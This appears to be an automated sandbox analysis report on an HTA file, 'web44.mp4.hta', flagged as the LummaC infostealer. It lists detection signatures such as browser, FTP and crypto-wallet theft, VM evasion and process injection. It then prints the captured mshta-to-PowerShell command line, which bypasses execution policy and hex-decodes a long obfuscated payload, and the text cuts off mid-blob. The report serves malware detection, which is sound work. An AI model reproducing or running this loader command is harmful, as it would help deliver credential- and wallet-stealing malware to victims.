Edit tour
Windows
Analysis Report
web44.mp4.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Potentially malicious time measurement code found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6616 cmdline:
mshta.exe "C:\Users\ user\Deskt op\web44.m p4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 7164 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction koWp ($WfBPy){r eturn -spl it ($WfBPy -replace '..', '0x$ & ')};$mBf yr = koWp( '9E334B36D A65FC4CD88 FD0D54C1C2 2FBF8DC3B0 4BEA415EE8 D3A4D1484B 0406150B7F F1C184327B 495DC49163 E68AE0670B A32D22B53F 3D21DCCDDA 39FD3253FE D91DE2B3F7 7E4037B055 F4B3412D5C CDC3A1B397 89F06F7930 DC4A07956F A68ECA8E2F 6499D93177 D1921AE241 8CB2699EC6 C80E7279A8 ABD6A9A4D7 E3FE3E8DBE 4570E1F55A 43D6D4C508 FA56991F95 689680AF64 B5262A41D3 D94C5F57CF A20AEB1A08 FF2BF17B5D ACB4212C70 DAB809FDB5 CBE0FB2234 7AE8AC80DF C19BE9C5BA 8E9936657F 3587DC5A7C 1B93B8B5B8 928D6F42DF FA7E01FDF4 E34C895C60 39AA5AAD3D 62F3554CF7 9FFD5E8D7A 01A4EE09AF F55F72C992 49D32B683A 307373EE57 BF7DABB7B6 43375C84A3 675780A533 50109BB137 CD9B3151E1 862197A092 A63D6891D6 0C45B0E088 70ACA193A7 AE7A69F71D 5319D1C559 1C30F1EB14 BF2E8CAC0C 0AA47B1CF2 6334122120 8EDD70ADC7 82580AEF18 2C6EDE0AC0 C8846BA021 32CCC59FE2 FBA0AF85CC 83A92B444E 34D299CE4B B78D2E6709 7531997B9C 398AFA59A0 5087AD10CB 8FCCD64B08 9CB7E1D944 8A06E5451B 7E1FAD3CD1 1656CE7D71 529FC0AEEE C74A57C9B8 ADA400E5BB 14D609B2A4 D2C9887A94 9A351792F6 DAAD814BCE F8C2537EA1 8295DBF31B EBE4D1BFA7 BBE02DADAC CFC47444EB 2B533F4A69 9B7865C058 48BB784791 ABDBA2F36A 897BE31994 3B5C85F80D 1B9901F0FF C376130685 53B99EE848 36A56CB1F7 0957317E3A 43F3D9EBBB E18FEEEE52 CE041029AB 9AE45A4C86 F910A6DDF5 765B4BDB03 CB85481DDC 8C8212A1F1 F92B468BE8 CB5336E24E D88C9EC8A0 1CD4F72DE4 04497DBB43 A1C6A38220 34F15F5F61 3EF5AD780B 9692707BAB 44FB088A60 61592C44B0 22A6D2A450 C99C283117 C8DE80E765 C31E703081 52E59458E6 FD3A65543C 1EC931AC1A 324732F6D1 FAAC4ABD5F 572332947D 1CB4967831 073016E5EF AEF616F931 7B004A73FF FA3BB2982E 91CBDEC269 FEF3EF9639 5F94BE96D5 496BDF35E2 5A6638E2E2 5097DB07C7 3C3EDD7402 BED8FC5008 82DA3AAFFC 8D06FD1BDD E8708DF8DF 844F0DDCEC CAA22D16BA B70D3B7D5E 264B1AE158 4137DD7BDA 7005C6F39D 6C9271A903 BB3663E0ED F514BF4A8D 05593DB9B5 DDFC4556BA C017AE2DE8 428EA44A76 D6E9AFC522 C9004ED9C5 93141666A5 2943AD4489 60D2C7623E 6C4AF33F5B AD89705B71 6C876AE63E 40D381B88E BEEB636361 4481CFB201 2ACABC9C09 E6D61B3014 9F2E4FA738 0A70464224 BEC1ABE947 5DBD5B97FC F0278165F2 1FB815FF60 146030497A 1AC45D69CA 7553003C73 3F00F0973A 5FD787F2E4 DEC6F22A0B D2B2F6F882 AFAFCFC5C9 03FB6AAEDD 7F994E2912 39B6B7D06C F6DF234FB0 6193412599 7FFAC95D45 11365A41A1 A1A2B19410 ABB92EE551 1D9ACB16AD BBCFE5B0C2 A4CF6C8B8C D6F6E0E9FD F723237337 0C3CB4477D 9D543073DA F28D5809AD 15346E15E3 E789993EF8 D9B807067B F4F5507838 02415488F7 44831F04FE EF6925ABC1 B6B107B100 2FF450B386 D584C659F0 7EB9483654 CA1F511654 7B9383D4F8 5CD91CE2D9 F6088D2CE4 9151257801 6E54A41FAE 48B2708F2A B1FA5C98F2 1304571169 F6900A36E6